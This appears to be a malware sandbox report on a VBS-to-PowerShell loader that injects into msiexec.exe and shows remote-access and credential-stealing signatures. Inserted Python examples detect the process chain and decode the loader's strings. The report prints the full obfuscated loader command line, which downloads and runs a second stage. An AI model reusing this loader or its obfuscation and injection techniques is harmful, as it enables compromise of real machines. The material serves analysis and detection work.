Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004 Thread sleep count: 1898 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004 Thread sleep time: -5694000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004 Thread sleep count: 8091 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004 Thread sleep time: -24273000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000003.1343994301.00000223ADA1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\F
Source: msiexec.exe, 00000007.00000002.2649817843.0000000006C59000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2649817843.0000000006C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1547929041.0000024870EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_045AD420 LdrInitializeThunk, 5_2_045AD420

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: Yara match, file source: amsi64_7536.amsi.csv, type: OTHER
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
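The observations above describe the Early Bird pattern: the 32-bit powershell.exe creates an argument-less msiexec.exe, queues an APC into it, writes its memory and resumes it. The following is an added detection example, not part of the Joe Sandbox report and not the sample's code. It replays the chain the report documents (wscript.exe launching powershell.exe, powershell.exe creating msiexec.exe and opening it with injection rights) over constructed records shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess). Assumptions: Sysmon logs neither NtQueueApcThread nor CREATE_SUSPENDED, so the injection step is inferred from the access rights the shell obtained on its child; the 64-bit to 32-bit PowerShell hop, which the report lists with parent "unknown", is modelled as a direct parent/child; the PIDs other than 7536 and 7824 and all command lines are made up.

```python
"""Process-chain detection for the wscript -> powershell -> msiexec injection chain.

Added example; the events are constructed to mirror the report, not real telemetry.
Rules fire per link of the chain, and chain_complete() ties the links together:
an argument-less target, spawned by a shell, opened by that same shell with
write+thread rights, whose ancestry reaches a script host.
"""

# Process access rights from winnt.h; together they allow write-then-execute.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
INJECT_TARGETS = {"msiexec.exe"}  # extend with other hollowing targets as needed

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSIEXEC32 = r"C:\Windows\SysWOW64\msiexec.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Start of the obfuscated command line from the report, truncated for the sample.
OBF_CMD = "\";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre'; [truncated]\""


def create(pid, ppid, image, parent, cmd):
    """Sysmon Event ID 1 (ProcessCreate) shaped record."""
    return {"EventID": 1, "ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "ParentImage": parent, "CommandLine": cmd}


def access(spid, src, tpid, tgt, granted):
    """Sysmon Event ID 10 (ProcessAccess) shaped record."""
    return {"EventID": 10, "SourceProcessId": spid, "SourceImage": src,
            "TargetProcessId": tpid, "TargetImage": tgt, "GrantedAccess": granted}


# Constructed event stream (PIDs 7536/7824 are the report's; the rest are invented).
EVENTS = [
    create(7184, 3412, WSCRIPT, EXPLORER, f'"{WSCRIPT}" "C:\\Users\\user\\Desktop\\Sublabially.vbs"'),
    create(7536, 7184, PS64, WSCRIPT, f'"{PS64}" ' + OBF_CMD),
    create(7824, 7536, PS32, PS64, f'"{PS32}" ' + OBF_CMD),
    create(8012, 7824, MSIEXEC32, PS32, f'"{MSIEXEC32}"'),  # no arguments at all
    access(7824, PS32, 8012, MSIEXEC32, 0x1FFFFF),          # PROCESS_ALL_ACCESS
    # Benign noise that must not fire:
    create(9001, 3412, PS64, EXPLORER, f'"{PS64}" -NoProfile -File C:\\scripts\\inventory.ps1'),
    create(9002, 3412, r"C:\Windows\System32\msiexec.exe", EXPLORER, r"msiexec.exe /i C:\setup.msi /qn"),
    access(1234, r"C:\Windows\System32\svchost.exe", 8012, MSIEXEC32, 0x1000),  # QUERY_LIMITED_INFORMATION
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline):
    """True if anything follows the (possibly quoted) executable token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.split(None, 1)[1] if " " in s else ""
    return bool(rest.strip())


def detect(events):
    """Return (rule, pid) findings, one per chain link that matched."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
            if parent in SCRIPT_HOSTS and img in SHELLS:
                findings.append(("script_host_spawns_shell", ev["ProcessId"]))
            if parent in SHELLS and img in INJECT_TARGETS and not has_arguments(ev["CommandLine"]):
                findings.append(("shell_spawns_argless_target", ev["ProcessId"]))
        elif ev["EventID"] == 10:
            src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            if src in SHELLS and tgt in INJECT_TARGETS and ev["GrantedAccess"] & INJECT_MASK == INJECT_MASK:
                findings.append(("shell_opens_target_for_injection", ev["TargetProcessId"]))
    return findings


def chain_complete(events):
    """True when an argument-less target was opened with injection rights by its own
    parent shell and that shell's ancestry reaches a script host."""
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    opened_by = {e["TargetProcessId"]: e["SourceProcessId"] for e in events
                 if e["EventID"] == 10 and e["GrantedAccess"] & INJECT_MASK == INJECT_MASK}
    for rule, pid in detect(events):
        if rule != "shell_spawns_argless_target" or opened_by.get(pid) != procs[pid]["ParentProcessId"]:
            continue
        cur = procs[pid]
        while cur is not None:  # walk up the parent chain looking for wscript/cscript
            if basename(cur["ParentImage"]) in SCRIPT_HOSTS:
                return True
            cur = procs.get(cur["ParentProcessId"])
    return False


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36s} pid={pid}")
    print("full chain observed:", chain_complete(EVENTS))
```

Each rule on its own is noisy (administrators do run PowerShell from scripts, and msiexec.exe is spawned constantly); the value is in chain_complete(), which only fires when the three links involve the same processes.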
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. 
cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn vald
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. 
cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn vald
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. 
cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn valdJump to behavior
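The command lines above all carry the same decoder: `Astroite` starts at index 4 (set only while `$host.Name` is non-empty) and keeps every 5th character of its argument, and `Forvanskende` passes each decoded string to the decoded token `iEx` (Invoke-Expression). The following is an added example, not part of the Joe Sandbox report and not the sample's code: a Python reimplementation of that stride decoder applied to strings copied from the command line, plus a small brute-force that recovers the (start, stride) pair from known tokens when the parameters are not obvious. The rendered report appears to have collapsed runs of spaces, so strings that originally contained double spaces (the full User-Agent value and the ServicePointManager line) no longer round-trip and are left out; the ones below were checked. The decoded URL is an indicator from this sample and should be treated as such, not visited.

```python
"""Stride deobfuscator for the loader strings in this report's PowerShell command line.

Added example. The loader's Astroite function is equivalent to the slice
s[4::5]; every other character of each literal is filler. Strings below are
copied verbatim from the report's command line (PowerShell variable -> parts).
"""

START, STRIDE = 4, 5  # from the command line: $Spildendes=4; $Racketlike+=5

# $Redefinerende is built from two Astroite calls joined with +=, so it has two parts.
# $Adkomsthaveren's second part contained double spaces in the original and is omitted.
ENCODED = {
    "Redefinerende": ["vascnVer,e roeT Oto.UhyrW",
                      "charEmel,B Si,CAnetL skiIbreceFeltNK.ont"],
    "Adkomsthaveren": ["ChepMUnwooK lizRangiLattlst nl Cena Pom/"],
    "Racketlikenddateringsfase": [" .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT"],
    "Aandsaristokratens": ["DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy"],
    "Tryksager": [" elm>"],
    "criminologist": ["Hulli BonEBat.x"],
}


def astroite(s, start=START, stride=STRIDE):
    """Reimplementation of the loader's Astroite: keep s[start], s[start+stride], ..."""
    return s[start::stride]


def decode_all(encoded=ENCODED, start=START, stride=STRIDE):
    """Decode every variable, joining multi-part values the way the script's += does."""
    return {name: "".join(astroite(part, start, stride) for part in parts)
            for name, parts in encoded.items()}


# Tokens a deobfuscated downloader string is expected to contain (case-insensitive).
KNOWN_TOKENS = ("net.", "://", "http", "iex", "user-agent", "mozilla")


def guess_params(encoded=ENCODED, max_stride=8):
    """Generalisation beyond this sample: score every small (start, stride) pair by how
    many known tokens its decoding produces and return the best pair. Lets the same
    code handle a re-obfuscated variant whose constants differ."""
    best, best_score = None, -1
    for stride in range(2, max_stride + 1):
        for start in range(stride):
            decoded = decode_all(encoded, start, stride)
            score = sum(tok in val.lower() for val in decoded.values() for tok in KNOWN_TOKENS)
            if score > best_score:
                best, best_score = (start, stride), score
    return best


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:28s} -> {value}")
    print("guessed (start, stride):", guess_params())
```

The decoded values show the stage-2 fetch in plain text: a Net.WebClient with a Mozilla User-Agent header downloading from the `Aandsaristokratens` URL, with the result passed to Invoke-Expression. The case mixing in the output (for example `neT.WEBCLIeNt`) is deliberate on the loader's side, since PowerShell type and cmdlet names are case-insensitive.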
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
Source: Yara match | File source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
